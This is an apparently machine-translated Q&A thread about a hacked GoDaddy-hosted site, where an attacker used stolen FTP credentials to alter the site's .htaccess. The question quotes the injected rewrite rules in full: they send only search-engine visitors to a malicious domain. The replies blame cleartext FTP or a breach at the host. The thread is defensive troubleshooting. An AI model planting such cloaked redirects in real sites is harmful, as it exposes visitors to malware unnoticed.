侵害されたFTPアカウントによるWebサイト攻撃の分析


9

私のサイトはハッキングされており、現時点ではいくつかの詳細を知っていますが、それがどのように発生したのか、または将来的にそれを防ぐ方法に正確に途方に暮れています。攻撃が再び発生するのを防ぐため、攻撃を分析するためにあなたの助けが必要です。これは少し長いですが、問題の解決に役立つ十分な情報を提供したいと思います。

これが起こったことです。

数週間前、ホスティング会社のGoDaddyからメールが届きました。私のサイトはリソースを使いすぎており、MySQLクエリが原因であると予想していました。問題のクエリは、5〜6語の検索クエリでした。私が設定した方法では、検索する用語が多いほど、クエリが複雑になります。問題ない。私はそれを修正しましたが、同時にGoDaddyも一時的に私のアカウントをシャットダウンし、すべてが正常に戻るまでに約3日かかりました。

その事件の後、私の検索エンジンのトラフィックは劇的に、約90%減少しました。私はそれを何も考えていなかったので、それをクエリの大失敗に書いて、グーグルがサイトを再クロールしたときにそれが時間内に戻ると考えて、それはうんざりしました。そうではなかった。

数日前、自分のサイトでマルウェアがホストされているというメールがユーザーから届きました。ブラウザに直接サイトを読み込みましたが、ページに何も挿入されていませんでした。次に、.htaccessファイルを確認したところ、次のことがわかりました。

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 [R,L]
</IfModule>

可愛い。そして少しうそをつく。アドレスバーまたはブックマークからサイトに直接移動すると、通常、サイトは通常どおり読み込まれます。検索エンジンからのリンクを介して自分のサイトにアクセスすることはめったにないので、ハッキングが検出されない限り、ハッキングが検出されませんでした。また、マルウェアは私のサイトで直接ホストされていませんでした。

簡単な検索で他の人も同じ問題を抱えていることがわかりましたが、まだそれを検出していない人はもっとたくさんいると思います。ほとんどの推奨事項は、ソフトウェアの最新バージョンへのアップグレード、パスワードの変更などです。

ユビキタスなWordpressではなく、独自のカスタムコンテンツ管理システムを使用しているため、少し深く掘り下げました。私はすべてのファイルをスキャンして、PHPのエクスプロイトで使用される一般的な関数を探しました:base64_decode、exec、shellなど...疑わしいものは何も見つかりませんでした。

次にGoDaddyのファイルマネージャーの履歴を確認したところ、.htaccessファイルが、検索クエリがサーバーリソースを使い果たしたと非難されたときとまったく同じ日に変更されていることがわかりました。残念ながら偶然かもしれませんが、よくわかりません。.htaccessファイルのリダイレクトはリソースを大量に消費しているようには見えず、クエリはリソースを大量に消費するほど複雑でした。

私のコードが問題ではないことを確認したかったので、.htaccessファイルが変更されたときにトラフィックログを調べて、疑わしいアクティビティがないか確認しましたが、異常または類似のGETまたはPOSTアクティビティはありませんでしたハッキングの試み。

最後に、GoDaddyにFTPログを要求したところ、.htaccessファイルが変更されたときに不正なFTPアクセスがあったことがわかりました。当時は休暇中で、コンピューターが物理的にシャットダウンされており、アクセス資格情報を持つユーザーは他にいませんでした。FTPでアカウントにプライマリFTPユーザーを使用したようですが、IPは91.220.0.19で、ラトビアのものであるようです

共有ホスティングでは、GoDaddyがサイトURLに基​​づいてプライマリFTPユーザー名を自動的に割り当てるようです。それは非常に予測可能です。少なくとも、ホスティングアカウントを設定したときのことです。私は数年前に最初にホスティングアカウントにサインアップしたため、変更された可能性がありますが、覚えている限りでは、プライマリFTPユーザー名を選択できませんでした。現在、ユーザー名を変更することもできません。アカウントをキャンセルして辞任しない限り、GoDaddyも変更できないようです。他のFTPユーザーを作成、削除、編集できますが、プライマリFTPユーザーは削除できません。変更できるのはパスワードのみです。

プライマリFTPユーザー名を除いて、サイト、データベース、管理者、およびアカウントのすべてのアクセス資格情報は、猫がキーボードの上を歩いたように見える、意味不明でランダムなユーザー名とパスワードです。例:lkSADf32!$ asJd3。

リンクの弱点に備えて、ウイルスやマルウェアなどがないかコンピュータを徹底的にスキャンしましたが、何も見つかりませんでした。ファイアウォールとウイルス対策プログラムを使用していて、安全なブラウジング習慣を使用するようにしています。

サイトを更新するときは、Core FTP LEとSSH / SFTP接続を使用します。ホスティングアカウントはLinuxセットアップです。

GoDaddyのテクニカルサポートと話していると、FTPパスワードがどのように侵害されたかはわかりません。共有ホスティングでは、FTPユーザーレベルでIPブロックを配置できません。また、プライマリFTPユーザー名を変更することもできません。FTPアクセスに関するブルートフォース保護があるかどうかを尋ねたところ、最初は不確かに聞こえましたが、何度か言い直したところ、そうでした。ただし、前の電話で同じ質問をして、GoDaddyにはFTPアクセスに対するブルートフォース保護がないと聞いたのを覚えていると思います。現時点では、彼らがそうであるかどうかはわかりません。

私はすべてのアクセス資格情報を全面的に変更し、.htaccessファイルを使用してラトビアのIPアドレスを禁止しました(FTPを使用している場合はおそらく違いがありません)が、FTPの方法はまだわかりませんもともとパスワードが危険にさらされていました。

私のコードに問題がなかった(それが原因であったとしても、FTP情報が公開されるべきではなかった)か、コンピューターに問題がなかったのはかなり確実です。私が疑うが、証明する方法がわからないのは、ユーザー名が予測可能だったためにFTPパスワードがブルートフォースされたということです。ブルートフォース攻撃は、サーバーのリソースが使い果たされている(クエリで非難されている)と同時に発生した可能性もありますが、それが可能か、それとも可能性があるかを知るのに十分なサーバーの技術的な側面は知りません。

今、私は私が何をすべきかを知っていることの終わりにいるような気がします。攻撃がどのように実行され、それを防ぐ方法を理解できるようにしたいので、攻撃ベクトル、実行可能な診断、または追加のセキュリティ対策について他にアイデアがあれば、とても感謝しています。ホストを変更したり、共有ホスティングを中止したりする以上のことはできますが、これが再発しないようにしたいのですが。

オビ=ワン・ケノービ...

回答:


8

投稿を読んでいるときに、なじみのあるものが見つかりました。それからそれは私に打撃を与えました:私はゲームのサイトにアクセスしようとするときに、1か月以上前にこれを見ました。ここを参照してください -同じ動作、検索エンジンの参照元でのみ行われるリダイレクトアクション。

.htaccess私の自宅のコンピュータのアンチウイルスが数週間前に私にそれについて大きな音を立てていたので、あなたのドメイン名は見覚えがありました。

そして、私がこれを観察したサイトのホスト、あなたはそれを知らないのですか?GoDaddy。

私はあなたが力ずくで強制されたり、自分の過ちによってパスワードが侵害されたりしたとは思いません。GoDaddyはここで妥協されたものだと思います。また、FTPパスワードをプレーンテキストで保存することはできません。さらに掘り下げたところ、この記事は同じことを示唆しています。総当たり攻撃の保護は彼らの問題の中で最も少ないかもしれません。


OPがFTPクレデンシャルを変更したと想定しています。うまくいけば、彼らはクリアテキストのパスワードストレージを使用していません。それは-かなり-かなりがっかりするでしょう。
エヴァンアンダーソン

@Evanただし、最後の段落でリンクされている記事をチェックしてください。「非難GoDaddy」理論をサポートするようです。つまり、パスワードの暗号化は、想像の中で興味深い演習にすぎません。;)
シェーンマッデン

もう一度見てから、SSHで接続します。ただし、使用する必要がある資格情報は、プライマリFTPユーザーの資格情報です。共有ホスティングで確認できるFTPでも機能せずに、SSHだけでユーザーをセットアップする方法はありません。
Dear Abby

@Dear SSH経由でログインすると、資格情報は転送中に暗号化されます。FTPやHTTPなどの非セキュアなプロトコルを介して接続する場合にのみ、ネットワーク上で盗聴される可能性があります。
シェーンマッデン

2
あなたが投稿全体を読むのに忍耐力があったという他の理由がないなら賛成です。
ウェズリー、

6

かんたん!FTPを使用しないでください。資格情報を平文で送信し、すべてのデータを平文で送信します。これは、ファイルを転送する最も安全でない方法の1つです。ホストが他の方法をサポートしていない場合は、新しいホストを見つけます。


+1-ホストされているサーバーへの直接のポイントツーポイント接続を取得できません。定義上、クリアテキストFTPログオンは信頼されていないネットワークを通過する必要あります。資格情報が途中のどこかでログに記録されたため、所有されました。(実際、DDDSは、サイトを変更した攻撃者が資格情報を取得した攻撃者ではなかったのは良いことです。おそらく、ISPのネットワーク内で実行されている未検出のスニファーによってログに記録され、売買された資格情報のデータベースに追加されました。 ..)今日のインターネットでは、平文認証を使って単純に生きることはできません。限目。
エヴァンアンダーソン

私は実際には、1年間以上SSHを使用していませんが、その間に一度もFTPを使用していません。ただし、GoDaddyがファイルを転送する他の方法を提供している場合でも、プライマリFTPユーザーを削除することはできません。私が言ったように、私はホストの切り替えで大丈夫です、私は何が起こったかを理解したいだけです。誰かがFTP資格情報をどのようにリッスンしますか?
親愛なるアビー、2011

@Dear-FTPユーザーとパスワードは、パケットではプレーンテキストになります。パケットをキャプチャできるプログラムは、それを明らかにします。エヴァンのコメントはそれをよく説明しています。
MDMarra 2011

@エヴァン-したがって、解決策は次のとおりです。FTPを使用したり、共有ホスティングを破棄したりしないでください。または、SSHを排他的に使用しても、共有ホスティングで安全ですか?
Dear Abby

3
@Dear-ホストが私のサイトでFTPを無効にできない場合、それらを使用したくありません。
MDMarra 2011
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.